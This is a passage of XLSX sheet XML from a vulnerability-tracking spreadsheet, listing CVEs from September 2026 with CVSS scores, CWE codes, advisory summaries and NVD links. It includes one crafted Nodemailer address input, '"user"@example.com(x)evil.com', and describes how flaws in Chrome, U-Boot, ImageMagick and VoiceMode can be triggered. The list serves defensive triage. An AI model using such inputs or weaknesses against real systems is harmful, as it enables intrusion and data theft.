          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Cleartext storage of sensitive information in the database in Devolutions Server 2026.3.5.0 and earlier allows an attacker with read access to the database to obtain external identity provider tokens and active session identifiers via direct inspection of stored records.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100288</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103054</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions before 12.0.0 contain an authorization bypass vulnerability in the MSSP module that allows authenticated users to add arbitrary tenants to portfolios they own. Attackers can submit tenant UUIDs via the add_tenants_to_portfolio endpoint to claim unclaimed tenants and read their security alerts, incidents, and posture metrics without consent.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103054</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74225</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains out-of-bounds memory access in dhcp6_parse_options() that fails to validate SERVERID and CLIENTID option lengths from DHCPv6 packets. Attackers on the local network can send crafted DHCPv6 ADVERTISE or REPLY packets during netboot to corrupt memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74225</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100699</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>Nodemailer is a Node.js email-sending library. In versions &gt;= 9.1.0 and &lt; 10.0.9, the address parser (src/addressparser) mishandles addresses whose local-part is a quoted string and that are followed by RFC 5322 comments, allowing trailing comment-separated domain atoms to be retained in the normalized address. For example, the input "user"@example.com(x)evil.com is parsed to the address value 'user@example.com evil.com', which contains additional attacker-controlled domain text separated by a literal space. This parsed value is used without further strict recipient validation when the message envelope is built (envelope.to in src/mime-node), so a malformed/ambiguous recipient address can be accepted and placed in the SMTP envelope. Whether this results in delivery to an unintended recipient on real SMTP servers has not been confirmed. The issue is a variant of the RFC 5322 comment parsing problem addressed in GHSA-cc9r-2j5m-2m83, affecting the separate quoted-local-part code path. Version 10.0.9 contains a fix.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100699</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97688</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr"/>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S52"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52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97688</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102310</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Payments in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102310</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102320</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in CORS in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102320</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102330</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102330</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95297</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Contextual Tasks in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95297</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95330</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Downloads in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95330</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95366</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-672</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Use of released resource in Core in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95366</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101911</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the Address6 constructor, Address6.isValid, and parse code in src/ipv6.ts accept unbounded strings and expand invalid characters through RE_BAD_CHARACTERS into large diagnostics. Material impact occurs only when an application accepts a very large attacker-controlled field and passes it to Address6 parsing without an earlier length bound. Common URL and header limits, and common body-parser defaults, generally constrain the effect; common defaults typically exclude 32 MiB fields. Megabyte-scale fields can cause a synchronous stall and high transient memory use, approximately 16 MiB can trigger an invalid string length exception, and process termination occurs at approximately 32 MiB. The affected entry points include Address6.isValid and construction paths that reach parse. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101911</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101912</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-843</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the isInSubnet and isHostInSubnet methods in src/common.ts compare masked binary strings without validating that both operands use the same IP family. A cross-family containment check whose leading address bits match makes the masked strings compare equal even though IPv4 and IPv6 do not share an address space. An allowlist or denylist decision can therefore classify an address outside the intended range as contained. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101912</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.7 → 6.3)</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102635</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>ImageMagick versions before 7.1.2-32 and 6.9.13-57 contain uninitialized heap memory disclosure in the GIF decoder's application extension handler in coders/gif.c. Attackers can craft malicious GIF files that cause the number parser to read uninitialized heap memory and store contents as image metadata, disclosing sensitive heap information.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102635</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79535</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>mbailey VoiceMode &lt;= 8.10.1 is vulnerable to OS Command Injection. The update_config MCP tool (and the "voicemode config set" CLI) writes a caller-supplied value into ~/.voicemode/voicemode.env without shell-safe escaping.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79535</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81872</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
